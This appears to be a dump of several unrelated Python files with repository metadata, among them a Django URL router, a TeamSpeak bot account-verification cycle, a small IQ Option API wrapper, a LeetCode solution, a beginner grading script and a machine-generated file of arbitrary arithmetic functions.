| no_license | https://github.com/JoaoGaBRiel-X/apitermoplus | 36b9469050d8b775e6beb9db64e1e0bac9e9f3e4 | c4a9c4cd09345932bc36df6875cab5f12f2609a6 | refs/heads/main | 2023-06-12T13:19:57.749066 | 2021-07-04T19:49:41 | 2021-07-04T19:49:41 | 381,844,925 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.contrib import admin
from django.db import router
from django.urls import path, include
from rest_framework import routers
from API.views import ClientesViewSet, VeiculosViewSet, ListaPatio, EntradaViewSet
router = routers.DefaultRouter()
router.register('clientes', ClientesViewSet, basename='Clientes')
router.register('veiculos', VeiculosViewSet, basename='Veiculos')
router.register('entrada', EntradaViewSet, basename='Entrada')
router.register('patio', ListaPatio, basename='Patio')
urlpatterns = [
path('admin/', admin.site.urls),
path('', include(router.urls)),
]
| UTF-8 | Python | false | false | 594 | py | 7 | urls.py | 5 | 0.779461 | 0.779461 | 0 | 16 | 36.125 | 82 |
AxForest/teamspeak_bot | 4,200,478,033,442 | e69f031831107749902698597f88f757ebb4ffdc | c6e7a384ddcb94bdc48ae6f1ca5bfd39cb722b73 | /ts3bot/cycle.py | e8bfbc048e3574a58f375045ab2c42923c08e749 | [
"MIT"
]
| permissive | https://github.com/AxForest/teamspeak_bot | 3112235d4fe148fb9d7abfb8f55c37ae192be240 | 920a53424484798b72ffe81a6004c20ccf8ee255 | refs/heads/pre-alliances | 2023-07-23T01:13:34.932675 | 2023-07-09T12:20:28 | 2023-07-09T12:20:28 | 121,895,530 | 3 | 2 | MIT | false | 2023-02-08T05:23:27 | 2018-02-17T21:49:42 | 2022-01-05T22:51:40 | 2023-02-08T05:23:26 | 578 | 3 | 1 | 3 | Python | false | false | import datetime
import logging
from collections.abc import Iterable
from typing import Any, cast
import requests
import ts3 # type: ignore
from sqlalchemy import and_, func, or_
from sqlalchemy.orm import Session
import ts3bot
from ts3bot.bot import Bot
from ts3bot.config import env
from ts3bot.database import enums, models
class Cycle:
def __init__( # noqa: PLR0912,PLR0913
self,
session: Session,
verify_all: bool,
verify_linked_worlds: bool,
verify_ts3: bool,
verify_world: int | None = None,
):
if any(
x is None
for x in [env.cycle_nickname, env.cycle_username, env.cycle_password]
):
raise Exception("Cycle credentials are not set correctly.")
self.bot = Bot(session, is_cycle=True)
self.session = session
self.verify_all = verify_all
self.verify_linked_worlds = verify_linked_worlds
self.verify_ts3 = verify_ts3
if verify_world:
self.verify_world: enums.World | None = enums.World(verify_world)
else:
self.verify_world = None
self.verify_begin = datetime.datetime.today()
def revoke(self, account: models.Account | None, cldbid: str) -> None:
if account:
account.invalidate(self.session)
changes = ts3bot.sync_groups(
self.bot, cldbid, account, remove_all=True, skip_whitelisted=True
)
if len(changes["removed"]) > 0:
logging.info(
"Revoked user's (cldbid:%s) groups (%s).", cldbid, changes["removed"]
)
else:
logging.debug("Removed no groups from user (cldbid:%s).", cldbid)
def fix_user_guilds(self) -> None:
"""
Removes duplicate selected guilds from users.
No need to force-sync the user as that's done on join and in the
following verification function.
"""
duplicate_guilds = (
self.session.query(models.LinkAccountGuild)
.filter(models.LinkAccountGuild.is_active.is_(True))
.group_by(models.LinkAccountGuild.account_id)
.having(func.count(models.LinkAccountGuild.guild_id) > 1)
)
for row in duplicate_guilds:
logging.warning(f"{row.account} has multiple guilds.")
# Unset duplicates
self.session.query(models.LinkAccountGuild).filter(
models.LinkAccountGuild.account_id == row.account_id,
models.LinkAccountGuild.id != row.id,
).update({"is_active": False})
self.session.commit()
def run(self) -> None:
# Skip check if multiple guilds are allowed
if not env.allow_multiple_guilds:
self.fix_user_guilds()
# Run if --ts3 is set or nothing was passed
if self.verify_ts3 or not (
self.verify_all or self.verify_linked_worlds or self.verify_world
):
self.verify_ts3_accounts()
self.verify_accounts()
# Clean up "empty" guilds
models.Guild.cleanup(self.session)
def verify_ts3_accounts(self) -> None: # noqa: PLR0912
if not self.bot.ts3c:
raise ConnectionError("Not connected yet.")
# Retrieve users
users = self.bot.exec_("clientdblist", duration=200)
start = 0
while len(users) > 0:
for counter, user in enumerate(users):
uid = user["client_unique_identifier"]
cldbid = user["cldbid"]
# Skip SQ account
if "ServerQuery" in uid:
continue
# Send keepalive
if counter % 100 == 0:
self.bot.ts3c.send_keepalive()
# Get user's account
account = models.Account.get_by_identity(self.session, uid)
if not account:
self.revoke(None, cldbid)
else:
# User was checked, don't check again
if (
ts3bot.timedelta_hours(
datetime.datetime.today() - account.last_check
)
< env.cycle_hours
and not self.verify_all
):
continue
logging.info("Checking %s/%s", account, uid)
try:
account.update(self.session)
# Sync groups
ts3bot.sync_groups(self.bot, cldbid, account)
except ts3bot.InvalidKeyError:
self.revoke(account, cldbid)
except ts3bot.ApiErrBadDataError:
logging.warning(
"Got ErrBadData for this account after multiple attempts."
)
except requests.RequestException:
logging.exception("Error during API call")
raise
# Skip to next user block
start += len(users)
try:
users = self.bot.exec_("clientdblist", start=start, duration=200)
except ts3.query.TS3QueryError as e:
# Fetching users failed, most likely at end
if e.args[0].error["id"] != "1281":
logging.exception("Error retrieving user list")
users = []
def verify_accounts(self) -> None:
"""
Removes users from known groups if no account is known or the account is invalid
"""
# Update all other accounts
if self.verify_all:
# Check all accounts that were not verified just now
accounts = self.session.query(models.Account).filter(
and_(
models.Account.last_check <= self.verify_begin,
models.Account.is_valid.is_(True),
)
)
elif self.verify_linked_worlds:
# Check all accounts which are on linked worlds, or on --world
def or_world() -> Any:
if self.verify_world:
return or_(
models.Account.world == self.verify_world,
models.WorldGroup.is_linked.is_(True),
)
else:
return models.WorldGroup.is_linked.is_(True)
accounts = (
self.session.query(models.Account)
.join(
models.WorldGroup,
models.Account.world == models.WorldGroup.world,
isouter=True,
)
.filter(
and_(
models.Account.last_check <= self.verify_begin,
or_world(),
models.Account.is_valid.is_(True),
)
)
)
elif self.verify_world:
# Only check accounts of this world
accounts = self.session.query(models.Account).filter(
and_(
models.Account.last_check
<= datetime.datetime.today()
- datetime.timedelta(hours=env.cycle_hours),
models.Account.is_valid.is_(True),
models.Account.world == self.verify_world,
)
)
else:
# Check all accounts which were not checked <x hours ago
accounts = self.session.query(models.Account).filter(
and_(
models.Account.last_check
<= datetime.datetime.today()
- datetime.timedelta(hours=env.cycle_hours),
models.Account.is_valid.is_(True),
)
)
num_accounts = accounts.count()
for idx, account in enumerate(cast(Iterable[models.Account], accounts)):
if idx % 100 == 0 or idx - 1 == num_accounts:
logging.info("%s/%s: Checking %s", idx + 1, num_accounts, account.name)
try:
account.update(self.session)
except ts3bot.InvalidKeyError:
pass
except ts3bot.ApiErrBadDataError:
logging.warning(
"Got ErrBadData for this account after "
"multiple attempts, ignoring for now."
)
except requests.RequestException:
logging.exception("Error during API call")
raise
| UTF-8 | Python | false | false | 8,659 | py | 51 | cycle.py | 40 | 0.514494 | 0.507564 | 0 | 239 | 35.230126 | 88 |
AlexCollin/IQOption-Bot-Trade-System | 7,868,380,099,667 | 5c36652a77b3544de626f329de47d35133d10758 | 0bea4de65ef8592d81fa119f46895745e35cad99 | /src/api/iqoption/http/getactives.py | 1839aa556e8e65bff0684179a0744d3e481323ce | []
| no_license | https://github.com/AlexCollin/IQOption-Bot-Trade-System | e76135c6cabb6041fcb528ff3db8e765b6acfc33 | 6ac55810e9872231e1df08753a2e5a6bebb54d93 | refs/heads/master | 2022-07-21T19:59:29.543773 | 2022-07-14T15:15:01 | 2022-07-14T15:15:01 | 80,314,537 | 38 | 42 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
"""Module for IQ Option http option/init/all resource."""
from src.api.iqoption.http.resource import Resource
class GetActives(Resource):
"""Class for IQ option option/init/all resource."""
# pylint: disable=too-few-public-methods
url = "/option/init/all"
def _get(self):
"""Send get request for IQ Option API getregdata http resource.
:returns: The instace of :class:`requests.Response`.
"""
return self.send_http_request("GET")
def __call__(self):
"""Method to get IQ Option API getregdata http request.
:returns: The instance of :class:`requests.Response`.
"""
return self._get()
| UTF-8 | Python | false | false | 699 | py | 57 | getactives.py | 49 | 0.629471 | 0.62804 | 0 | 25 | 26.96 | 71 |
abrarfmahendra/chapter-5-protek-abrar-farizi-m-ptikB | 1,245,540,546,882 | 6f641212158550fd9d26a60f5b1758dba0deedde | 3da3a98dcc635a83820ae3792562145e21d51292 | /chapter 5 prak 1 lat no 3.py | 2730743dd2974b7071fa232eaf875370c381d0b3 | []
| no_license | https://github.com/abrarfmahendra/chapter-5-protek-abrar-farizi-m-ptikB | 80722aaccc5d2c18c445cf5e4f55979cd4c64241 | fb2eb1abfd0b917cfa731c7c1907ae3cd53a626c | refs/heads/main | 2023-01-02T10:57:48.070281 | 2020-11-02T13:16:47 | 2020-11-02T13:16:47 | 309,373,273 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | nilai = int(input("masukan nilai indonesia = "))
nilai = int(input("masukan nilai ipa = "))
nilai = int(input("masukan nilai matematika = "))
lulus = "Selamat anda Lulus"
gagal = "maaf, Anda tidak lulus"
validasi = "input benar"
tidakvalidasi = "Maaf, input ada yang tidak valid"
if nilai>=60 :
print(lulus)
elif nilai<=60 :
print(gagal)
else :
print(gagal)
print("sebab ketidaklulusan:")
if nilai<60:
print("-Nilai bhs indonesia kurang dari 60")
if nilai<60:
print("-Nilai ipa kurang dari 60")
if nilai<70:
print("-Nilai matematika kurang dari 70")
| UTF-8 | Python | false | false | 596 | py | 14 | chapter 5 prak 1 lat no 3.py | 13 | 0.661074 | 0.634228 | 0 | 21 | 26.380952 | 50 |
Guan93/leetcode | 2,113,123,917,428 | 8e28fe58d0d3cc4078a373a7f97cbfc9dbbf3672 | 4d28c81eed7eb3f69ff2c182ab35d1ccb6364f9c | /410.split-array-largest-sum.py | db0e27d599d2da47f0b1a1c943aa2c9e35bc3921 | []
| no_license | https://github.com/Guan93/leetcode | a6e182537f71b39aa3ec4e094458b0ebc4fd536c | 14a99f506004a1167d954805179d2fa0c41c1436 | refs/heads/master | 2020-11-29T08:44:09.109348 | 2020-09-26T03:47:35 | 2020-09-26T03:47:35 | 230,072,465 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #
# @lc app=leetcode id=410 lang=python3
#
# [410] Split Array Largest Sum
#
# @lc code=start
# # brute force: O(C(n-1, m-1))
# class Solution:
# def splitArray(self, nums: List[int], m: int) -> int:
# self.ans = float("inf")
# n = len(nums)
# def dfs(curr_idx, curr_m, curr_max, curr_sum):
# if curr_idx == n and curr_m == m:
# self.ans = min(self.ans, curr_max)
# if curr_idx == n:
# return
# if curr_m == m:
# self.ans = min(max(curr_sum + sum(nums[curr_idx:]), curr_max), self.ans)
# else:
# if curr_idx > 0:
# dfs(curr_idx + 1, curr_m, max(curr_max, curr_sum + nums[curr_idx]), curr_sum + nums[curr_idx])
# dfs(curr_idx + 1, curr_m + 1, max(curr_max, nums[curr_idx]), nums[curr_idx])
# return
# dfs(0, 0, -float("inf"), 0)
# return self.ans
# # dp:O(mn^2) O(mn) TLE
# class Solution:
# def splitArray(self, nums: List[int], m: int) -> int:
# n = len(nums)
# dp = [[float("inf")] * (m + 1) for _ in range(n + 1)]
# dp[0][0] = 0
# cumsum = [0] * (n + 1)
# for i in range(n):
# cumsum[i + 1] = cumsum[i] + nums[i]
# for i in range(1, n + 1):
# for j in range(1, m + 1):
# for k in range(0, i):
# dp[i][j] = min(dp[i][j], max(dp[k][j - 1], cumsum[i] - cumsum[k]))
# return dp[-1][-1]
# binary search with greedy: O(nlog(sum(nums))) and O(1)
class Solution:
def splitArray(self, nums: List[int], m: int) -> int:
l, r = max(nums), sum(nums)
ans = r
while l <= r:
mid = (r - l) // 2 + l
cnt, curr_sum = 1, 0
for num in nums:
if curr_sum + num <= mid:
curr_sum += num
else:
cnt += 1
curr_sum = num
if cnt > m:
l = mid + 1
break
if cnt <= m:
r = mid - 1
ans = min(ans, mid)
return ans
# @lc code=end
| UTF-8 | Python | false | false | 2,195 | py | 367 | 410.split-array-largest-sum.py | 367 | 0.420046 | 0.401822 | 0 | 72 | 29.486111 | 116 |
multinspired/myblog | 5,257,040,008,074 | 83b72fca780468eac33ce0dfba7db510cdc2c64f | e499cade4263b4f357aca523c030d25a28226522 | /theinspired/blog/admin.py | 53d46ef5fc40e97e8bc85611601726b228307d55 | []
| no_license | https://github.com/multinspired/myblog | 9b4184173b196ffc10929280acc0401b756f3832 | eeffb2c1a46693f843e86f94d0a3483f9d8f7b54 | refs/heads/master | 2020-06-18T03:34:04.394423 | 2019-07-10T07:12:45 | 2019-07-10T07:12:45 | 196,151,474 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.contrib import admin
from .models import Articles
from .models import QuestList
admin.site.register(Articles)
admin.site.register(QuestList)
| UTF-8 | Python | false | false | 161 | py | 12 | admin.py | 6 | 0.795031 | 0.795031 | 0 | 6 | 24.833333 | 32 |
imnnquy/algorithm-training-may-june-2020 | 764,504,198,212 | a55d382588d40004063f6173645be75e060a470c | 4c7b186abb8ab50258e0f073409881ca761dbe93 | /01-Topological Sort/05 - UVA - 11060.py | c65fe99be3a9f33cf460f3cb50433036e1c3374a | []
| no_license | https://github.com/imnnquy/algorithm-training-may-june-2020 | 3b38d9b2a6d669955f2bb21cee9af9ee0313a262 | 9118bc30c22033c6755e67624730a41ec76292fa | refs/heads/master | 2022-07-29T06:07:43.412665 | 2020-05-22T13:59:22 | 2020-05-22T13:59:22 | 261,198,268 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # https://onlinejudge.org/index.php?option=com_onlinejudge&Itemid=8&category=22&page=show_problem&problem=2001
import heapq
def kahn(graph):
V = len(graph)
in_degree = [0] * V
for i in range(V):
for j in graph[i]:
in_degree[j] += 1
zero_in_degree = []
for i in range(V):
if in_degree[i] == 0:
heapq.heappush(zero_in_degree, i)
result = []
while zero_in_degree:
u = heapq.heappop(zero_in_degree)
result.append(u)
for i in graph[u]:
in_degree[i] -= 1
if in_degree[i] == 0:
heapq.heappush(zero_in_degree, i)
return result
def solution():
counter = 1
while True:
N = 0
try:
N = int(input())
except Exception:
return
name_to_order = dict()
order_to_name = ['' for i in range(N)]
for i in range(N):
name = input().strip()
name_to_order[name] = i
order_to_name[i] = name
graph = [[] for i in range(N)]
M = int(input())
for i in range(M):
first, seccond = map(str, input().split())
graph[name_to_order[first]].append(name_to_order[seccond])
result = kahn(graph)
map_result = []
for i in range(N):
map_result.append(order_to_name[result[i]])
print(f'Case #{counter}: Dilbert should drink beverages in this order: ', end='')
print(*map_result, end='.')
counter += 1
try:
input()
except Exception:
return
print()
solution()
| UTF-8 | Python | false | false | 1,637 | py | 15 | 05 - UVA - 11060.py | 14 | 0.503971 | 0.494808 | 0 | 69 | 22.724638 | 110 |
bomb1e/gotgit | 9,371,618,659,781 | b86edd0c3e464a76f1b5346f150a6cbfe44bee19 | 7192da38b6afd3c60f80ccbecb3040cf34369ce3 | /6eac9828-3287-4eac-9bec-53387285494c.py | f7935581168072e79ba792072ca5871d997c1d87 | []
| no_license | https://github.com/bomb1e/gotgit | 6699fa9e6adb0a79f22441df41a102b09b78c2ce | 3c14cb6d1d0c4cba6a1e24a9899462d2e4bee2ce | refs/heads/master | 2020-06-12T06:00:34.695425 | 2018-08-01T02:00:02 | 2018-08-01T02:00:02 | 75,600,461 | 2 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | from __future__ import print_function
def func44(arg289, arg290):
if arg290 < arg289:
var295 = class45()
else:
var295 = class47()
for var296 in (arg290 ^ arg289 for i in [i ^ 4 for i in range(17)]):
var295.func46(arg290, arg290)
var300 = func49(arg289, arg290)
var301 = func53()
var302 = (arg290 - arg289 - var300) & arg290
var303 = (arg289 | 828 | var300) & arg289
var304 = (arg290 + -495 | var302) & var301
var305 = var300 - ((var302 & var300) + var302)
var306 = (var305 | var304) - var303 + var305
var307 = -797 ^ var304 & arg290 - 1739820921
var308 = -832 & (952810442 & var300 & var306)
if var308 < arg290:
var309 = var307 & var300
else:
var309 = (var306 ^ var300) - var301
var310 = arg289 - ((arg289 ^ arg290) - -247)
var311 = (arg289 | (var303 & var306)) | -928494540
var312 = var300 - var303 & -500 + var304
if var304 < var305:
var313 = var302 - var301
else:
var313 = var311 ^ var310
var314 = ((var311 | arg290) - -356) | var308
var315 = (var310 + var312) & (var305 + var303)
var316 = var305 | (var306 - var308) - 750923191
var317 = var301 & (var314 - var301) ^ var305
if var308 < var300:
var318 = ((var304 + var308) ^ var310) - arg290
else:
var318 = var316 - var305 - var302
var319 = var306 + (var317 & var316) + var315
var320 = 657 + var317 & var310 | arg290
var321 = var310 ^ (var303 ^ var317)
var322 = (var319 + var317 & var305) ^ -1976770599
result = var305 ^ var319
return result
def func53():
func51()
result = len(range(29))
func52()
return result
def func52():
global len
del len
def func51():
global len
len = lambda x : 9
class class47(object):
def func46(self, arg293, arg294):
return 0
class class45(class47):
def func46(self, arg291, arg292):
return 0
def func34(arg196, arg197):
var219 = var200(arg197, arg196)
var249 = var222(arg197, arg196)
var255 = func41(var219, arg196)
var260 = func42(var219, arg197)
var263 = func43(arg197, var260)
var264 = var219 & -969
var265 = var255 | var255 - var255 | var249
var266 = (var265 - var260) & (var255 & var260)
if var263 < var266:
var267 = -356 + var266 & 1242569097 - -338299529
else:
var267 = ((arg197 ^ var263) - var265) | var219
var268 = var255 + -393 + var264 - var263
var269 = var265 & var255
var270 = var269 + var268
var271 = (var260 + var255 | arg197) - var249
var272 = arg197 - var269 & arg196
var273 = 227982549 & var271 + var260 | arg197
var274 = (var269 | -2066898224 | 2092997037) | var272
var275 = (arg196 & arg197 + var266) | var268
var276 = var219 & (var264 ^ var219) | var275
var277 = var276 + (var274 & var219)
var278 = var219 + var249 + var255 + 939
var279 = var268 - var260
if var274 < var274:
var280 = var270 + var260
else:
var280 = var265 & var277
var281 = var270 + var268
var282 = arg197 + var276
var283 = var268 ^ var282 + var274 ^ var255
if var281 < var265:
var284 = (var264 - var271) + var219 ^ var275
else:
var284 = var281 - (var263 ^ var270 | var272)
if var281 < var283:
var285 = var276 ^ var275
else:
var285 = var260 + (var273 + var278) ^ var277
var286 = (var273 ^ var249) ^ var283 - var276
var287 = (var264 ^ var271) & (var219 ^ var263)
var288 = 1325634529 + (var278 & var283 + arg197)
result = var266 + var268 | (var272 - 340) ^ var265 ^ var282 | var275 + var270 ^ -300
return result
def func43(arg261, arg262):
result = -660 | arg261
return result
def func42(arg256, arg257):
var258 = 0
for var259 in range(5):
var258 += 5 + var259 + arg257
return var258
def func41(arg250, arg251):
var252 = (arg250 - arg251 & arg251 + ((arg251 & (-1204783491 | arg250)) + (962 - (1720612357 & arg250 - 442)))) ^ -910
var253 = ((((299 & (var252 + (var252 | 585))) ^ 2040105576 ^ var252 - var252 | var252 ^ (var252 - (arg250 & arg251))) + var252) | 2127017744) & -1803421046 - arg251 & (arg251 + var252 ^ arg251)
var254 = (var252 - (var253 ^ arg251)) | arg250
result = arg251 ^ -497468887 ^ (arg251 + var253 - 2027291639)
return result
def func40(arg223, arg224):
var225 = arg223 - arg224
var226 = arg224 - -247650782 ^ -1323333970
var227 = var225 - (var225 & var226) & arg224
var228 = var226 + (var226 ^ (687 | var226))
var229 = (61992347 & var225) ^ var225 | arg224
if arg224 < var229:
var230 = (var225 - var226) - var228 - var226
else:
var230 = var226 ^ var225
var231 = var226 & arg223 ^ (var226 ^ var226)
var232 = (var227 & var231 - arg224) | arg223
var233 = (var226 - var226 ^ arg224) & var229
var234 = var228 - var225 + arg223
var235 = 320 ^ var232 ^ var233 & var231
var236 = (2033751270 & var226) & 919
var237 = var227 | var231 & var234 ^ var227
var238 = (887 | (var231 + var234)) | -819189742
var239 = var225 - var227
var240 = var236 - var239
var241 = 87 ^ -219 + var237
var242 = (var226 - arg223 & var226) | var225
var243 = (var241 ^ (var235 ^ var228)) ^ var238
var244 = ((var226 | arg223) - -267) + var228
var245 = (-370600548 & var233) - (var237 & var238)
var246 = 1352369612 + var243
var247 = var244 & var244
var248 = (var242 + (arg224 & var233)) ^ var234
result = (var248 ^ var247 - ((var248 | ((((var231 | var238) | arg224) & var233) | var236)) ^ var235)) ^ var242
return result
def func39():
closure = [-9]
def func38(arg220, arg221):
closure[0] += func40(arg220, arg221)
return closure[0]
func = func38
return func
var222 = func39()
def func37(arg201, arg202):
var203 = (-305 ^ -636781843) + -685
var204 = (arg201 - arg201 | -266) + var203
var205 = 248 ^ arg201
var206 = arg202 & -1569169294 | -885 ^ -742173192
var207 = arg201 | arg202
var208 = (var206 & var206) & var207
var209 = var207 | (arg201 & var206 ^ var204)
var210 = var205 + ((var206 + var208) ^ var208)
var211 = ((var203 + -704) - var209) | var206
var212 = arg201 ^ var211
var213 = 305 | var211 & var211 - var205
var214 = (var203 ^ arg202) - var210 - -664947846
var215 = (var204 + var212) + var213
var216 = var212 | var211 & var212
var217 = arg202 ^ var207 & var214 ^ var208
var218 = var217 | ((var203 & var204) ^ arg201)
result = -382917553 + var218
return result
def func36():
closure = [7]
def func35(arg198, arg199):
closure[0] += func37(arg198, arg199)
return closure[0]
func = func35
return func
var200 = func36()
def func24(arg125, arg126):
var160 = func25(arg126, arg125)
var161 = func30()
var182 = var164(arg125, arg126)
if arg126 < arg126:
var183 = arg126 ^ 992
else:
var183 = var161 ^ var161 ^ var161 ^ var182
var184 = (-1239234101 + var182) + arg126 ^ var160
var185 = var182 ^ 601
var186 = ((var184 - var185) ^ arg126) & var184
var187 = ((var186 - var185) | 866004316) & var160
var188 = var186 & -631 | var187 | var187
var189 = (-944379133 + var188) + var186 & arg125
if var188 < var186:
var190 = arg125 + var187 | arg126 + var185
else:
var190 = var186 + arg126
var191 = var188 & (var185 & arg126 + arg125)
if var160 < var188:
var192 = var184 & arg125 - (-1579279711 & var187)
else:
var192 = (var184 | var189) & 1566365235
var193 = (var160 ^ 377776917 - var186) ^ var185
var194 = var193 | (var161 | var185) ^ var193
var195 = var185 - var191 | var182 + var161
result = var194 & (var193 ^ (var188 & var161) | (((var189 & var182 + var161 + (arg126 - var195) + -271) + 586) - arg125))
return result
def func33(arg165, arg166):
var167 = -633 - 425754212
var168 = arg165 ^ arg166 ^ 634
if var168 < var168:
var169 = var167 + 1902089246
else:
var169 = -509034624 - arg166
var170 = arg166 - -1589480955 | arg165 - arg166
var171 = var167 & arg166
if var168 < var171:
var172 = (var171 - var170 - var171) & arg165
else:
var172 = (arg165 + var167) | var167 ^ var170
var173 = var168 + -358 - arg165 ^ var170
if var170 < var170:
var174 = 495 & arg165
else:
var174 = var173 | arg166 + var168 + -355
var175 = arg165 - var173 - 178468486 ^ var171
var176 = var175 & 636 - (var175 & 491709595)
var177 = var175 & (var176 + (var171 - var175))
var178 = var171 & var170 | (var167 + var176)
var179 = (1435918805 & var173 - var176) ^ var177
var180 = var171 - ((var177 | var177) ^ var179)
if var173 < var175:
var181 = (var175 - var177 + var176) - var168
else:
var181 = ((var177 | var180) & var177) - var175
result = var178 ^ var173 ^ ((var170 | ((var167 & (var178 | var171) - var177) - var176 - var179) + var175) & var168) ^ var167
return result
def func32():
closure = [8]
def func31(arg162, arg163):
closure[0] += func33(arg162, arg163)
return closure[0]
func = func31
return func
var164 = func32()
def func30():
func28()
result = len(range(14))
func29()
return result
def func29():
global len
del len
def func28():
global len
len = lambda x : 6
def func25(arg127, arg128):
def func26(arg129, arg130):
var131 = arg130 + arg127 + ((1032217474 - ((-442 & -627) ^ -146 | (44 | (arg129 + -2027007534) - 710 - arg129 & arg130)) + (arg127 | arg127) & (arg127 ^ (arg128 & arg130 - 1262429105))) | -778)
var132 = arg128 & ((arg129 & var131) + arg127) & -58 - arg130 - (var131 | ((arg127 & 927 & -225) - (543 | -834)) ^ arg129 & (973 ^ (arg129 + var131 - (arg129 - -112762835)))) ^ 740198679 + arg130 | -2032542002 - arg130
result = arg129 | ((((var131 | var131 ^ arg127) & arg130 ^ arg129 - arg130) - -361) - arg127 + arg130 | var132) + arg127
return result
var133 = func26(arg127, arg128)
def func27(arg134, arg135):
var136 = var133 | -340 - arg128 | arg134
var137 = (var133 - arg135) ^ (arg128 - ((arg135 & arg135) + 386)) + var136 ^ var133 | (arg134 + arg134 | (arg128 | (arg135 ^ (arg128 - (arg135 - (var136 + var136 - var136))) ^ 32)) - -1653286 | arg128 - arg135) | arg127
var138 = 891 + arg128 ^ (arg128 | (arg127 - var137) & (arg134 | -1921798994) - -164 - var133 | var136)
var139 = 746 ^ (arg135 | var136 - (var138 ^ arg128 - var136 & (((arg128 & arg135 + arg134) - (arg127 - (var138 | 241) | (var138 & var133))) & arg135 ^ (var133 & 275)) - var138) ^ -422571782 + var138 & 1760640996)
result = var139 | arg127
return result
var140 = func27(var133, arg128)
var141 = arg128 & 150929293 - 873 + var140
if var140 < var133:
var142 = -833111019 & var141
else:
var142 = arg127 - var133 ^ -1285656674 + var140
var143 = var140 & var140 - 1535011185 | var141
var144 = var141 | arg127 & (-2018659109 ^ 466)
var145 = var144 - 690
var146 = var141 + arg128 & arg128 ^ var144
var147 = var144 - arg128
var148 = var140 | var143
var149 = -353 ^ var144
if var141 < arg128:
var150 = ((var140 - -469) + var148) | var141
else:
var150 = arg127 + var140 & -876 ^ 1640523082
var151 = var141 - arg128
var152 = -259 ^ var141 - var148
var153 = var152 ^ (var144 + arg127) | var141
var154 = (-549 & var146) ^ var146 | arg128
var155 = var149 | var140
var156 = var148 - var143 + var148
var157 = (arg127 - var146 ^ arg127) | var147
var158 = var157 - var157
var159 = var157 + arg127
result = var146 ^ (var148 - var159 | ((var152 ^ var154 & var140 + (var159 | var149) + 236254376) ^ var133 | var149))
return result
def func12(arg58, arg59):
var64 = func13(arg59, arg58)
if var64 < arg58:
var69 = class14()
else:
var69 = class16()
for var70 in range(35):
var71 = var69.func15
var71(arg58, var64)
if arg58 < var64:
var76 = class18()
else:
var76 = class20()
for var77 in range(10):
var76.func19(var64, arg59)
var100 = func22(arg58, arg59)
var122 = func23(arg58, var64)
var123 = (arg58 + var64 ^ (var64 + ((var64 & var64 | arg58) & var64 - var122)) | (var122 + 67)) ^ var64
var124 = -656775216 ^ arg58 - var64 - arg59
result = var123 + var64 + arg59 | (var64 ^ var124)
return result
def func23(arg101, arg102):
var103 = -722 & 1488809552
var104 = var103 + arg101 | var103
var105 = arg102 - arg102
var106 = var103 - arg101
var107 = -775 & var103
var108 = (var106 & var106 | var103) - var106
var109 = 1463055881 + -884 - arg101 & var106
var110 = arg102 + -1772363859
var111 = (var106 + var106) + var103 ^ 283
var112 = var106 & var108
var113 = arg101 + 1144166770
var114 = var106 - var109 & var110 | -1606906187
var115 = arg102 - arg102 + var109
var116 = var105 + var108
var117 = var114 | var106 ^ var110
var118 = (var103 ^ var110 ^ var111) & arg102
var119 = var115 ^ (var114 ^ var118) - var109
var120 = var113 + var108 ^ arg102
var121 = var107 ^ var115
result = var121 | var109 | var106 - (((var121 | var119 | (var115 & var113)) + var109 ^ var108 + var108) | var114) ^ var103
return result
def func22(arg78, arg79):
var80 = (-950093545 - arg79 | arg78) + arg78
var81 = (158561442 & 593 + -936156509) + var80
var82 = 1393819247 | (arg78 ^ (-210 ^ 721))
if arg78 < var81:
var83 = (-1111548489 + var81 ^ var81) & var80
else:
var83 = arg79 + var82 - var80 | arg79
var84 = -409505401 | -1548960377 - 460
var85 = (arg79 | arg78 ^ var80) + arg78
var86 = arg78 + (1856271165 & var81) - var82
if var85 < var80:
var87 = var86 | var80
else:
var87 = 886 - -977593229 ^ var82 | arg78
if arg78 < var80:
var88 = ((var81 & var85) + arg78) - arg79
else:
var88 = var86 ^ -683
var89 = (arg78 | var86) + var86 + arg78
var90 = var81 ^ ((var86 & var80) - arg78)
var91 = arg79 ^ -245 - 634660613 & var81
var92 = 1207571156 + var85
var93 = (var82 & var91 - arg79) & var91
var94 = var82 + (var89 | var86)
var95 = var82 - var90 & var92 ^ var89
var96 = (arg78 ^ (490711036 + var84)) - var91
var97 = ((var90 - 107) + var95) & -66
if var94 < var96:
var98 = (var80 ^ var95 & var81) + var81
else:
var98 = var96 & var82 + var85 + arg79
var99 = ((var97 | var81) + var97) ^ var93
result = (var85 ^ (((479887675 + var92 & var85 & (var85 & var84)) | var86 + var80 - var97) ^ 1738260675) | var95) + var96
return result
class class20(object):
def func19(self, arg74, arg75):
result = arg74 | arg74
return result
class class18(object):
def func19(self, arg72, arg73):
result = arg72 - -2139436850
return result
class class16(object):
def func15(self, arg67, arg68):
result = (1 + (((-532693810 & -1021966746) - arg68) | -1 | arg68)) - 1
return result
class class14(class16):
def func15(self, arg65, arg66):
result = -1 + arg66 - -80430261 - arg65 ^ 442142498 + (arg66 - arg66)
return result
def func13(arg60, arg61):
var62 = 0
for var63 in range(25):
var62 += arg60 - var63 ^ var62
return var62
def func1(arg1, arg2):
if arg2 < arg1:
var7 = class2()
else:
var7 = class4()
for var8 in func6(arg1, arg2):
var7.func3(arg2, arg2)
var46 = arg1 | arg1
if arg1 < var46:
var47 = arg1 | ((var46 & arg2) & -152)
else:
var47 = (arg1 - arg1) & -1119432941
var48 = 406486576 ^ arg2 + arg1 & -38443491
var49 = 2135735539 ^ -550437908
var50 = var46 ^ var49
var51 = 471 - (974 & (arg2 ^ -658))
var52 = ((var51 ^ var46) - 760) | var51
var53 = (arg1 + var46) + var52 - var48
var54 = (var53 + var52 - var48) | var53
var55 = -722564471 ^ var52 & var50 & 1323834004
var56 = (var48 - var55) - var48 & -557993836
var57 = -2126399968 | var46
result = var55 - var51 - (var49 ^ ((var56 | (arg1 ^ var55)) ^ var57 ^ var49))
return result
def func7(arg11, arg12):
var13 = func10()
var30 = func11(arg11, arg12)
var31 = 413783674 + arg12
var32 = (var30 & arg12) ^ arg12
if arg11 < var32:
